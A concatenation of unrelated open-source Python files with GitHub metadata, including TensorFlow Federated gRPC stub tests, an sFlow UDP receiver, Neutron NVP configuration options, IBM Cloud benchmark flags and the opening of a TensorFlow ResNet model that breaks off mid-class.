data = get_data()
date_object = datetime.strptime(str(given_date), "%y%m%d").date()
employees = {
user: interval(data[user][date]['start'], data[user][date]['end'])
for user in data
for date in data[user]
if date == date_object
}
return employees
| {
"content_hash": "552cd1ef17b2c97c0384d2cf717dfc65",
"timestamp": "",
"source": "github",
"line_count": 214,
"max_line_length": 79,
"avg_line_length": 27.83177570093458,
"alnum_prop": 0.537441235728677,
"repo_name": "stxnext-kindergarten/presence-analyzer-gderdak",
"id": "5ae45c814ded50f0a51088aa6721684b6bb2ab00",
"size": "5980",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/presence_analyzer/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "990"
},
{
"name": "HTML",
"bytes": "9776"
},
{
"name": "Python",
"bytes": "31643"
}
],
"symlink_target": ""
} |
import _plotly_utils.basevalidators
class BgcolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bgcolor", parent_name="histogram.hoverlabel", **kwargs
):
super(BgcolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "style"),
**kwargs
)
| {
"content_hash": "f876b2c149a3bea9077ad4f5557bfc4b",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 81,
"avg_line_length": 34.6,
"alnum_prop": 0.5915221579961464,
"repo_name": "plotly/python-api",
"id": "0295abca82b3f62a6188071d1281ef13bf7cb937",
"size": "519",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/histogram/hoverlabel/_bgcolor.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "6870"
},
{
"name": "Makefile",
"bytes": "1708"
},
{
"name": "Python",
"bytes": "823245"
},
{
"name": "Shell",
"bytes": "3238"
}
],
"symlink_target": ""
} |
"""Tests for remote_executor_grpc_stub."""
from unittest import mock
from absl.testing import absltest
import grpc
import portpicker
import tensorflow as tf
from google.protobuf import any_pb2
from tensorflow_federated.proto.v0 import executor_pb2
from tensorflow_federated.proto.v0 import executor_pb2_grpc
from tensorflow_federated.python.core.impl.executors import executors_errors
from tensorflow_federated.python.core.impl.executors import remote_executor_grpc_stub
from tensorflow_federated.python.core.impl.executors import value_serialization
def create_stub():
port = portpicker.pick_unused_port()
channel = grpc.insecure_channel('localhost:{}'.format(port))
return remote_executor_grpc_stub.RemoteExecutorGrpcStub(channel)
def _raise_grpc_error_unavailable(*args):
del args # Unused
error = grpc.RpcError()
error.code = lambda: grpc.StatusCode.UNAVAILABLE
raise error
def _raise_non_retryable_grpc_error(*args):
del args # Unused
error = grpc.RpcError()
error.code = lambda: grpc.StatusCode.ABORTED
raise error
class GrpcConnectivityTest(absltest.TestCase):
def fake_channel_subscribe(self, callback, try_to_connect=True):
if try_to_connect:
callback(grpc.ChannelConnectivity.READY)
def test_grpc_connectivity(self):
channel = mock.create_autospec(grpc.Channel, instance=True)
channel.subscribe.side_effect = self.fake_channel_subscribe
stub = remote_executor_grpc_stub.RemoteExecutorGrpcStub(channel)
self.assertTrue(stub.is_ready)
@mock.patch.object(executor_pb2_grpc, 'ExecutorGroupStub')
class RemoteExecutorGrpcStubTest(absltest.TestCase):
def test_compute_returns_result(self, mock_executor_grpc_stub):
tensor_proto = tf.make_tensor_proto(1)
any_pb = any_pb2.Any()
any_pb.Pack(tensor_proto)
value = executor_pb2.Value(tensor=any_pb)
response = executor_pb2.ComputeResponse(value=value)
instance = mock_executor_grpc_stub.return_value
instance.Compute = mock.Mock(side_effect=[response])
request = executor_pb2.ComputeRequest(
executor=executor_pb2.ExecutorId(), value_ref=executor_pb2.ValueRef())
stub = create_stub()
result = stub.compute(request)
instance.Compute.assert_called_once()
value, _ = value_serialization.deserialize_value(result.value)
self.assertEqual(value, 1)
def test_compute_raises_retryable_error_on_grpc_error_unavailable(
self, mock_executor_grpc_stub):
instance = mock_executor_grpc_stub.return_value
instance.Compute = mock.Mock(side_effect=_raise_grpc_error_unavailable)
stub = create_stub()
with self.assertRaises(executors_errors.RetryableError):
stub.compute(
executor_pb2.ComputeRequest(value_ref=executor_pb2.ValueRef()))
def test_compute_reraises_grpc_error(self, grpc_stub):
instance = grpc_stub.return_value
instance.Compute = mock.Mock(side_effect=_raise_non_retryable_grpc_error)
stub = create_stub()
request = executor_pb2.ComputeRequest(
executor=executor_pb2.ExecutorId(), value_ref=executor_pb2.ValueRef())
with self.assertRaises(grpc.RpcError) as context:
stub.compute(request)
self.assertEqual(context.exception.code(), grpc.StatusCode.ABORTED)
def test_get_executor(self, mock_executor_grpc_stub):
response = executor_pb2.GetExecutorResponse()
instance = mock_executor_grpc_stub.return_value
instance.GetExecutor = mock.Mock(side_effect=[response])
stub = create_stub()
result = stub.get_executor(request=executor_pb2.GetExecutorRequest())
self.assertEqual(result, response)
def test_create_value_returns_value(self, mock_executor_grpc_stub):
response = executor_pb2.CreateValueResponse()
instance = mock_executor_grpc_stub.return_value
instance.CreateValue = mock.Mock(side_effect=[response])
stub = create_stub()
result = stub.create_value(request=executor_pb2.CreateValueRequest())
self.assertEqual(result, response)
def test_create_value_raises_retryable_error_on_grpc_error_unavailable(
self, mock_executor_grpc_stub):
instance = mock_executor_grpc_stub.return_value
instance.CreateValue = mock.Mock(side_effect=_raise_grpc_error_unavailable)
stub = create_stub()
with self.assertRaises(executors_errors.RetryableError):
stub.create_value(request=executor_pb2.CreateValueRequest())
def test_create_value_reraises_grpc_error(self, mock_executor_grpc_stub):
instance = mock_executor_grpc_stub.return_value
instance.CreateValue = mock.Mock(
side_effect=_raise_non_retryable_grpc_error)
stub = create_stub()
with self.assertRaises(grpc.RpcError) as context:
stub.create_value(request=executor_pb2.CreateValueRequest())
self.assertEqual(context.exception.code(), grpc.StatusCode.ABORTED)
def test_create_value_reraises_type_error(self, mock_executor_grpc_stub):
instance = mock_executor_grpc_stub.return_value
instance.CreateValue = mock.Mock(side_effect=TypeError)
stub = create_stub()
with self.assertRaises(TypeError):
stub.create_value(request=executor_pb2.CreateValueRequest())
def test_create_call_returns_remote_value(self, mock_executor_grpc_stub):
response = executor_pb2.CreateCallResponse()
instance = mock_executor_grpc_stub.return_value
instance.CreateCall = mock.Mock(side_effect=[response])
stub = create_stub()
result = stub.create_call(request=executor_pb2.CreateCallRequest())
instance.CreateCall.assert_called_once()
self.assertEqual(result, response)
def test_create_call_raises_retryable_error_on_grpc_error_unavailable(
self, mock_executor_grpc_stub):
instance = mock_executor_grpc_stub.return_value
instance.CreateCall = mock.Mock(side_effect=_raise_grpc_error_unavailable)
stub = create_stub()
with self.assertRaises(executors_errors.RetryableError):
stub.create_call(request=executor_pb2.CreateCallRequest())
def test_create_call_reraises_grpc_error(self, mock_executor_grpc_stub):
instance = mock_executor_grpc_stub.return_value
instance.CreateCall = mock.Mock(side_effect=_raise_non_retryable_grpc_error)
stub = create_stub()
with self.assertRaises(grpc.RpcError) as context:
stub.create_call(request=executor_pb2.CreateCallRequest())
self.assertEqual(context.exception.code(), grpc.StatusCode.ABORTED)
def test_create_call_reraises_type_error(self, mock_executor_grpc_stub):
instance = mock_executor_grpc_stub.return_value
instance.CreateCall = mock.Mock(side_effect=TypeError)
stub = create_stub()
with self.assertRaises(TypeError):
stub.create_call(request=executor_pb2.CreateCallRequest())
def test_create_struct_returns_value(self, mock_executor_grpc_stub):
response = executor_pb2.CreateStructResponse()
instance = mock_executor_grpc_stub.return_value
instance.CreateStruct = mock.Mock(side_effect=[response])
stub = create_stub()
result = stub.create_struct(request=executor_pb2.CreateStructRequest())
instance.CreateStruct.assert_called_once()
self.assertEqual(result, response)
def test_create_struct_raises_retryable_error_on_grpc_error_unavailable(
self, mock_executor_grpc_stub):
instance = mock_executor_grpc_stub.return_value
instance.CreateStruct = mock.Mock(side_effect=_raise_grpc_error_unavailable)
stub = create_stub()
with self.assertRaises(executors_errors.RetryableError):
stub.create_struct(request=executor_pb2.CreateStructRequest())
def test_create_struct_reraises_grpc_error(self, mock_executor_grpc_stub):
instance = mock_executor_grpc_stub.return_value
instance.CreateStruct = mock.Mock(
side_effect=_raise_non_retryable_grpc_error)
stub = create_stub()
with self.assertRaises(grpc.RpcError) as context:
stub.create_struct(request=executor_pb2.CreateStructRequest())
self.assertEqual(context.exception.code(), grpc.StatusCode.ABORTED)
def test_create_struct_reraises_type_error(self, mock_executor_grpc_stub):
instance = mock_executor_grpc_stub.return_value
instance.CreateStruct = mock.Mock(side_effect=TypeError)
stub = create_stub()
with self.assertRaises(TypeError):
stub.create_struct(request=executor_pb2.CreateStructRequest())
def test_create_selection_returns_value(self, mock_executor_grpc_stub):
response = executor_pb2.CreateSelectionResponse()
instance = mock_executor_grpc_stub.return_value
instance.CreateSelection = mock.Mock(side_effect=[response])
stub = create_stub()
result = stub.create_selection(
request=executor_pb2.CreateSelectionRequest())
instance.CreateSelection.assert_called_once()
self.assertEqual(result, response)
def test_create_selection_raises_retryable_error_on_grpc_error_unavailable(
self, mock_executor_grpc_stub):
instance = mock_executor_grpc_stub.return_value
instance.CreateSelection = mock.Mock(
side_effect=_raise_grpc_error_unavailable)
stub = create_stub()
with self.assertRaises(executors_errors.RetryableError):
stub.create_selection(request=executor_pb2.CreateSelectionRequest())
def test_create_selection_reraises_non_retryable_grpc_error(
self, mock_executor_grpc_stub):
instance = mock_executor_grpc_stub.return_value
instance.CreateSelection = mock.Mock(
side_effect=_raise_non_retryable_grpc_error)
stub = create_stub()
with self.assertRaises(grpc.RpcError) as context:
stub.create_selection(request=executor_pb2.CreateSelectionRequest())
self.assertEqual(context.exception.code(), grpc.StatusCode.ABORTED)
def test_create_selection_reraises_type_error(self, mock_executor_grpc_stub):
instance = mock_executor_grpc_stub.return_value
instance.CreateSelection = mock.Mock(side_effect=TypeError)
stub = create_stub()
with self.assertRaises(TypeError):
stub.create_selection(request=executor_pb2.CreateSelectionRequest())
if __name__ == '__main__':
absltest.main()
| {
"content_hash": "420eb4a31d8bcc39e36c979f655170ff",
"timestamp": "",
"source": "github",
"line_count": 260,
"max_line_length": 85,
"avg_line_length": 38.49230769230769,
"alnum_prop": 0.7437050359712231,
"repo_name": "tensorflow/federated",
"id": "f143f8128eadd6580b3a4bba9ce60c5c9bc1edd3",
"size": "10607",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tensorflow_federated/python/core/impl/executors/remote_executor_grpc_stub_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "729470"
},
{
"name": "Dockerfile",
"bytes": "1983"
},
{
"name": "Python",
"bytes": "6700736"
},
{
"name": "Shell",
"bytes": "7123"
},
{
"name": "Starlark",
"bytes": "387382"
}
],
"symlink_target": ""
} |
"""
.. module:: server
:synopsis: SFlow UDP server
.. moduleauthor:: Colin Alston <colin@imcol.in>
"""
from twisted.internet.protocol import DatagramProtocol
from twisted.internet import reactor
from duct.protocol.sflow import protocol
from duct.protocol.sflow.protocol import flows, counters
class DatagramReceiver(DatagramProtocol):
"""DatagramReceiver for sFlow packets
"""
def datagramReceived(self, data, address):
host, _port = address
sflow = protocol.Sflow(data, host)
for sample in sflow.samples:
if isinstance(sample, protocol.FlowSample):
self.process_flow_sample(sflow, sample)
if isinstance(sample, protocol.CounterSample):
self.process_counter_sample(sflow, sample)
def process_flow_sample(self, sflow, flow):
"""Process an incomming flow sample
"""
for v in flow.flows.values():
if isinstance(v, flows.HeaderSample) and v.frame:
reactor.callLater(0, self.receive_flow, flow, v.frame,
sflow.host)
def process_counter_sample(self, sflow, counter):
"""Process an incomming counter sample
"""
for v in counter.counters.values():
if isinstance(v, counters.InterfaceCounters):
reactor.callLater(0, self.receive_counter, v, sflow.host)
elif isinstance(v, counters.HostCounters):
reactor.callLater(0, self.receive_host_counter, v)
def receive_flow(self, flow, sample, host):
"""Called when a flow is received
"""
pass
def receive_counter(self, counter, host):
"""Called when a counter is received
"""
pass
def receive_host_counter(self, counter, host):
"""Called when a host counter is received
"""
pass
| {
"content_hash": "701b316c7b3057c6f2893461550361df",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 73,
"avg_line_length": 31.796610169491526,
"alnum_prop": 0.6210021321961621,
"repo_name": "ducted/duct",
"id": "4ee70d52a7b79f341bf95dac9843f976d001e691",
"size": "1876",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "duct/protocol/sflow/server.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "507"
},
{
"name": "HTML",
"bytes": "1429"
},
{
"name": "Puppet",
"bytes": "2736"
},
{
"name": "Python",
"bytes": "309584"
},
{
"name": "Ruby",
"bytes": "1756"
},
{
"name": "Shell",
"bytes": "8041"
}
],
"symlink_target": ""
} |
''' dbrev.nv_arg can be thought of as a bean or a template. It
has only attributes with getters and setters.
'''
import logging
LOG = logging.getLogger(__name__)
# LOG.setLevel(logging.INFO)
# Long lines expected.
# pylint: disable=C0301
# Cyclic imports protected by functions
# pylint: disable=R0401
class NvArg(object):
'''NvArg class generated from NV_ARGS table.'''
def __init__(self, namespace_name=None, name=None, value=None, session_id=None):
self.namespace_name = namespace_name
self.name = name
self.value = value
self.session_id = session_id
self._namespace = None
self._session = None
def __str__(self):
out = 'NvArg('
if self.namespace_name != None:
out += 'namespace_name:' + str(self.namespace_name) + ','
if self.name != None:
out += 'name:' + str(self.name) + ','
if self.value != None:
out += 'value:' + str(self.value) + ','
if self.session_id != None:
out += 'session_id:' + str(self.session_id)
if out[-1:] == ',':
out = out[:-1]
out += ')'
return out
def get_namespace(self):
''' Getter method for namespace.'''
if self.namespace_name != None and self._namespace == None:
from freevolv.models.dbrev import nv_arg_namespaces_table
self._namespace = nv_arg_namespaces_table.NvArgNamespacesTable.get_instance() \
.get_one(name=self.namespace_name)
return self._namespace
def set_namespace(self, namespace):
''' Setter method for namespace.'''
self._namespace = namespace
namespace = property(get_namespace, set_namespace)
def get_session(self):
''' Getter method for session.'''
if self.session_id != None and self._session == None:
from freevolv.models.dbrev import sessions_table
self._session = sessions_table.SessionsTable.get_instance() \
.get_one(oid=self.session_id)
return self._session
def set_session(self, session):
''' Setter method for session.'''
self._session = session
session = property(get_session, set_session)
| {
"content_hash": "08e964114ad70a86f4511cf1f7b5f042",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 91,
"avg_line_length": 35.41269841269841,
"alnum_prop": 0.5934558493948902,
"repo_name": "genevolv/dbrev",
"id": "2a41094c8eaa4c70c000af275969572f34f8ba41",
"size": "2231",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "py/freevolv/models/dbrev/nv_arg.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "306037"
}
],
"symlink_target": ""
} |
from oslo.config import cfg
class AgentModes:
AGENT = 'agent'
# TODO(armando-migliaccio): support to be added, maybe we could add a
# mixed mode to support no-downtime migrations?
AGENTLESS = 'agentless'
class MetadataModes:
DIRECT = 'access_network'
INDIRECT = 'dhcp_host_route'
nvp_opts = [
cfg.IntOpt('max_lp_per_bridged_ls', default=5000,
help=_("Maximum number of ports of a logical switch on a "
"bridged transport zone (default 5000)")),
cfg.IntOpt('max_lp_per_overlay_ls', default=256,
help=_("Maximum number of ports of a logical switch on an "
"overlay transport zone (default 256)")),
cfg.IntOpt('concurrent_connections', default=10,
help=_("Maximum concurrent connections to each NVP "
"controller.")),
cfg.IntOpt('nvp_gen_timeout', default=-1,
help=_("Number of seconds a generation id should be valid for "
"(default -1 meaning do not time out)")),
cfg.StrOpt('metadata_mode', default=MetadataModes.DIRECT,
help=_("If set to access_network this enables a dedicated "
"connection to the metadata proxy for metadata server "
"access via Neutron router. If set to dhcp_host_route "
"this enables host route injection via the dhcp agent. "
"This option is only useful if running on a host that "
"does not support namespaces otherwise access_network "
"should be used.")),
cfg.StrOpt('default_transport_type', default='stt',
help=_("The default network tranport type to use (stt, gre, "
"bridge, ipsec_gre, or ipsec_stt)")),
cfg.StrOpt('agent_mode', default=AgentModes.AGENT,
help=_("The mode used to implement DHCP/metadata services."))
]
sync_opts = [
cfg.IntOpt('state_sync_interval', default=120,
help=_("Interval in seconds between runs of the state "
"synchronization task. Set it to 0 to disable it")),
cfg.IntOpt('max_random_sync_delay', default=0,
help=_("Maximum value for the additional random "
"delay in seconds between runs of the state "
"synchronization task")),
cfg.IntOpt('min_sync_req_delay', default=10,
help=_('Minimum delay, in seconds, between two state '
'synchronization queries to NVP. It must not '
'exceed state_sync_interval')),
cfg.IntOpt('min_chunk_size', default=500,
help=_('Minimum number of resources to be retrieved from NVP '
'during state synchronization')),
cfg.BoolOpt('always_read_status', default=False,
help=_('Always read operational status from backend on show '
'operations. Enabling this option might slow down '
'the system.'))
]
connection_opts = [
cfg.StrOpt('nvp_user',
default='admin',
help=_('User name for NVP controllers in this cluster')),
cfg.StrOpt('nvp_password',
default='admin',
secret=True,
help=_('Password for NVP controllers in this cluster')),
cfg.IntOpt('req_timeout',
default=30,
help=_('Total time limit for a cluster request')),
cfg.IntOpt('http_timeout',
default=10,
help=_('Time before aborting a request')),
cfg.IntOpt('retries',
default=2,
help=_('Number of time a request should be retried')),
cfg.IntOpt('redirects',
default=2,
help=_('Number of times a redirect should be followed')),
cfg.ListOpt('nvp_controllers',
help=_("Lists the NVP controllers in this cluster")),
]
cluster_opts = [
cfg.StrOpt('default_tz_uuid',
help=_("This is uuid of the default NVP Transport zone that "
"will be used for creating tunneled isolated "
"\"Neutron\" networks. It needs to be created in NVP "
"before starting Neutron with the nvp plugin.")),
cfg.StrOpt('default_l3_gw_service_uuid',
help=_("Unique identifier of the NVP L3 Gateway service "
"which will be used for implementing routers and "
"floating IPs")),
cfg.StrOpt('default_l2_gw_service_uuid',
help=_("Unique identifier of the NVP L2 Gateway service "
"which will be used by default for network gateways")),
cfg.StrOpt('default_service_cluster_uuid',
help=_("Unique identifier of the Service Cluster which will "
"be used by logical services like dhcp and metadata")),
cfg.StrOpt('default_interface_name', default='breth0',
help=_("Name of the interface on a L2 Gateway transport node"
"which should be used by default when setting up a "
"network connection")),
]
DEFAULT_STATUS_CHECK_INTERVAL = 2000
vcns_opts = [
cfg.StrOpt('user',
default='admin',
help=_('User name for vsm')),
cfg.StrOpt('password',
default='default',
secret=True,
help=_('Password for vsm')),
cfg.StrOpt('manager_uri',
help=_('uri for vsm')),
cfg.StrOpt('datacenter_moid',
help=_('Optional parameter identifying the ID of datacenter '
'to deploy NSX Edges')),
cfg.StrOpt('deployment_container_id',
help=_('Optional parameter identifying the ID of datastore to '
'deploy NSX Edges')),
cfg.StrOpt('resource_pool_id',
help=_('Optional parameter identifying the ID of resource to '
'deploy NSX Edges')),
cfg.StrOpt('datastore_id',
help=_('Optional parameter identifying the ID of datastore to '
'deploy NSX Edges')),
cfg.StrOpt('external_network',
help=_('Network ID for physical network connectivity')),
cfg.IntOpt('task_status_check_interval',
default=DEFAULT_STATUS_CHECK_INTERVAL,
help=_("Task status check interval"))
]
# Register the configuration options
cfg.CONF.register_opts(connection_opts)
cfg.CONF.register_opts(cluster_opts)
cfg.CONF.register_opts(nvp_opts, "NVP")
cfg.CONF.register_opts(sync_opts, "NVP_SYNC")
cfg.CONF.register_opts(vcns_opts, group="vcns")
| {
"content_hash": "a927fa5d5d98480348f12b762fc83d54",
"timestamp": "",
"source": "github",
"line_count": 147,
"max_line_length": 78,
"avg_line_length": 45.666666666666664,
"alnum_prop": 0.5724713242961418,
"repo_name": "ntt-sic/neutron",
"id": "12306b030fcb8fc588a0eade4b9f65f6f7b0859f",
"size": "7363",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "neutron/plugins/nicira/common/config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "37307"
},
{
"name": "JavaScript",
"bytes": "67930"
},
{
"name": "Python",
"bytes": "7243854"
},
{
"name": "Shell",
"bytes": "8983"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
} |
"""
byceps.util.jobqueue
~~~~~~~~~~~~~~~~~~~~
An asynchronously processed job queue based on Redis_ and RQ_.
.. _Redis: http://redis.io/
.. _RQ: http://python-rq.org/
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from contextlib import contextmanager
from flask import current_app
from rq import Connection, Queue
from byceps.redis import redis
@contextmanager
def connection():
with Connection(redis.client):
yield
def get_queue(app):
is_async = app.config['JOBS_ASYNC']
return Queue(is_async=is_async)
def enqueue(*args, **kwargs):
"""Add the function call to the queue as a job."""
with connection():
queue = get_queue(current_app)
queue.enqueue(*args, **kwargs)
| {
"content_hash": "ec2cc497540f2bb84a78568949884a04",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 62,
"avg_line_length": 20.945945945945947,
"alnum_prop": 0.672258064516129,
"repo_name": "m-ober/byceps",
"id": "986ea4f067dad9c228713d9e7017ba6b28cff32f",
"size": "775",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "byceps/util/jobqueue.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "38499"
},
{
"name": "Dockerfile",
"bytes": "1302"
},
{
"name": "HTML",
"bytes": "369989"
},
{
"name": "JavaScript",
"bytes": "9483"
},
{
"name": "Python",
"bytes": "1152996"
}
],
"symlink_target": ""
} |
from clld.web.app import get_configurator
# we must make sure custom models are known at database initialization!
from autotyp import models
def main(global_config, **settings):
""" This function returns a Pyramid WSGI application.
"""
config = get_configurator('autotyp', settings=settings)
config.include('autotyp.datatables')
config.include('autotyp.adapters')
return config.make_wsgi_app()
| {
"content_hash": "4fc305f5fc4b6658af697eb587b7403e",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 71,
"avg_line_length": 32.38461538461539,
"alnum_prop": 0.7363420427553444,
"repo_name": "clld/autotyp",
"id": "0590e97614cce057479548f4409427ee826a6c4c",
"size": "421",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "autotyp/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1"
},
{
"name": "JavaScript",
"bytes": "1"
},
{
"name": "Python",
"bytes": "21342"
}
],
"symlink_target": ""
} |
"""Module containing flags applicable across benchmark run on IBM Cloud."""
from absl import flags
flags.DEFINE_string('ibmcloud_azone', None,
'IBMCloud internal DC name')
flags.DEFINE_integer('ibmcloud_volume_iops', 20000,
'Desired volume IOPS.')
flags.DEFINE_integer('ibmcloud_volume_bandwidth', None,
'Desired volume bandwidth in Mbps.')
flags.DEFINE_boolean('ibmcloud_volume_encrypted', False,
'Enable encryption on volume creates.')
flags.DEFINE_string('ibmcloud_image_username', 'root',
'Ssh username for cloud image.')
flags.DEFINE_integer('ibmcloud_polling_delay', 2,
'Delay between polling attempts in seconds.')
flags.DEFINE_integer('ibmcloud_timeout', 600,
'timeout in secs.')
flags.DEFINE_integer('ibmcloud_boot_disk_size', 10,
'boot volume disk size.')
flags.DEFINE_boolean('ibmcloud_debug', False,
'debug flag.')
flags.DEFINE_boolean('ibmcloud_resources_keep', False,
'keep resources.')
flags.DEFINE_string('ibmcloud_volume_profile', 'custom',
'volume profile')
flags.DEFINE_string('ibmcloud_bootvol_encryption_key', None,
'boot volume encryption key crn')
flags.DEFINE_string('ibmcloud_datavol_encryption_key', None,
'data volume encryption key crn')
flags.DEFINE_string('ibmcloud_vpcid', None,
'IBM Cloud vpc id')
flags.DEFINE_string('ibmcloud_subnet', None,
'primary subnet id')
flags.DEFINE_string('ibmcloud_networks', None,
'additional network ids, comma separated')
flags.DEFINE_string('ibmcloud_prefix', 'perfkit',
'resource name prefix')
flags.DEFINE_string('ibmcloud_rgid', None,
'Resource Group id for the account.')
flags.DEFINE_integer('ibmcloud_boot_volume_iops', 3000,
'boot voume iops')
flags.DEFINE_integer('ibmcloud_boot_volume_size', 0,
'boot voume size in GB')
flags.DEFINE_string('ibmcloud_pub_keyid', None,
'rias public sshkey id')
flags.DEFINE_integer('ibmcloud_network_mtu', 9000,
'MTU size on network interfaces.')
flags.DEFINE_integer('ibmcloud_subnets_extra', 0,
'extra subnets to lookup')
flags.DEFINE_integer('ibmcloud_vdisks_extra', 0,
'extra disks to create')
flags.DEFINE_string('ibmcloud_image_info', None,
'image info in json formatted file')
flags.DEFINE_boolean('ibmcloud_encrypted_image', False,
'encrypted image.')
| {
"content_hash": "19a63d68ace0419ada77c700ebc5b83e",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 75,
"avg_line_length": 33.666666666666664,
"alnum_prop": 0.6087275394206088,
"repo_name": "GoogleCloudPlatform/PerfKitBenchmarker",
"id": "37964fe5ef397296275522b31af654802f9c7a91",
"size": "3337",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "perfkitbenchmarker/providers/ibmcloud/flags.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "3420"
},
{
"name": "HTML",
"bytes": "113073"
},
{
"name": "Jinja",
"bytes": "62005"
},
{
"name": "Lua",
"bytes": "1547"
},
{
"name": "Python",
"bytes": "6076512"
},
{
"name": "R",
"bytes": "1017"
},
{
"name": "Shell",
"bytes": "76164"
},
{
"name": "Tcl",
"bytes": "14601"
}
],
"symlink_target": ""
} |
""" TensorFlow ResNet model."""
from typing import Dict, Optional, Tuple, Union
import tensorflow as tf
from ...activations_tf import ACT2FN
from ...modeling_tf_outputs import (
TFBaseModelOutputWithNoAttention,
TFBaseModelOutputWithPoolingAndNoAttention,
TFImageClassifierOutputWithNoAttention,
)
from ...modeling_tf_utils import TFPreTrainedModel, TFSequenceClassificationLoss, keras_serializable, unpack_inputs
from ...tf_utils import shape_list
from ...utils import add_code_sample_docstrings, add_start_docstrings, add_start_docstrings_to_model_forward, logging
from .configuration_resnet import ResNetConfig
logger = logging.get_logger(__name__)
# General docstring
_CONFIG_FOR_DOC = "ResNetConfig"
_FEAT_EXTRACTOR_FOR_DOC = "AutoFeatureExtractor"
# Base docstring
_CHECKPOINT_FOR_DOC = "microsoft/resnet-50"
_EXPECTED_OUTPUT_SHAPE = [1, 2048, 7, 7]
# Image classification docstring
_IMAGE_CLASS_CHECKPOINT = "microsoft/resnet-50"
_IMAGE_CLASS_EXPECTED_OUTPUT = "tiger cat"
TF_RESNET_PRETRAINED_MODEL_ARCHIVE_LIST = [
"microsoft/resnet-50",
# See all resnet models at https://huggingface.co/models?filter=resnet
]
class TFResNetConvLayer(tf.keras.layers.Layer):
def __init__(
self, out_channels: int, kernel_size: int = 3, stride: int = 1, activation: str = "relu", **kwargs
) -> None:
super().__init__(**kwargs)
self.pad_value = kernel_size // 2
self.conv = tf.keras.layers.Conv2D(
out_channels, kernel_size=kernel_size, strides=stride, padding="valid", use_bias=False, name="convolution"
)
# Use same default momentum and epsilon as PyTorch equivalent
self.normalization = tf.keras.layers.BatchNormalization(epsilon=1e-5, momentum=0.9, name="normalization")
self.activation = ACT2FN[activation] if activation is not None else tf.keras.layers.Activation("linear")
def convolution(self, hidden_state: tf.Tensor) -> tf.Tensor:
# Pad to match that done in the PyTorch Conv2D model
height_pad = width_pad = (self.pad_value, self.pad_value)
hidden_state = tf.pad(hidden_state, [(0, 0), height_pad, width_pad, (0, 0)])
hidden_state = self.conv(hidden_state)
return hidden_state
def call(self, hidden_state: tf.Tensor, training: bool = False) -> tf.Tensor:
hidden_state = self.convolution(hidden_state)
hidden_state = self.normalization(hidden_state, training=training)
hidden_state = self.activation(hidden_state)
return hidden_state
class TFResNetEmbeddings(tf.keras.layers.Layer):
"""
ResNet Embeddings (stem) composed of a single aggressive convolution.
"""
def __init__(self, config: ResNetConfig, **kwargs) -> None:
super().__init__(**kwargs)
self.embedder = TFResNetConvLayer(
config.embedding_size,
kernel_size=7,
stride=2,
activation=config.hidden_act,
name="embedder",
)
self.pooler = tf.keras.layers.MaxPool2D(pool_size=3, strides=2, padding="valid", name="pooler")
self.num_channels = config.num_channels
def call(self, pixel_values: tf.Tensor, training: bool = False) -> tf.Tensor:
_, _, _, num_channels = shape_list(pixel_values)
if tf.executing_eagerly() and num_channels != self.num_channels:
raise ValueError(
"Make sure that the channel dimension of the pixel values match with the one set in the configuration."
)
hidden_state = pixel_values
hidden_state = self.embedder(hidden_state)
hidden_state = tf.pad(hidden_state, [[0, 0], [1, 1], [1, 1], [0, 0]])
hidden_state = self.pooler(hidden_state)
return hidden_state
class TFResNetShortCut(tf.keras.layers.Layer):
"""
ResNet shortcut, used to project the residual features to the correct size. If needed, it is also used to
downsample the input using `stride=2`.
"""
def __init__(self, out_channels: int, stride: int = 2, **kwargs) -> None:
super().__init__(**kwargs)
self.convolution = tf.keras.layers.Conv2D(
out_channels, kernel_size=1, strides=stride, use_bias=False, name="convolution"
)
# Use same default momentum and epsilon as PyTorch equivalent
self.normalization = tf.keras.layers.BatchNormalization(epsilon=1e-5, momentum=0.9, name="normalization")
def call(self, x: tf.Tensor, training: bool = False) -> tf.Tensor:
hidden_state = x
hidden_state = self.convolution(hidden_state)
hidden_state = self.normalization(hidden_state, training=training)
return hidden_state
class TFResNetBasicLayer(tf.keras.layers.Layer):
"""
A classic ResNet's residual layer composed by two `3x3` convolutions.
"""
def __init__(
self, in_channels: int, out_channels: int, stride: int = 1, activation: str = "relu", **kwargs
) -> None:
super().__init__(**kwargs)
should_apply_shortcut = in_channels != out_channels or stride != 1
self.conv1 = TFResNetConvLayer(out_channels, stride=stride, name="layer.0")
self.conv2 = TFResNetConvLayer(out_channels, activation=None, name="layer.1")
self.shortcut = (
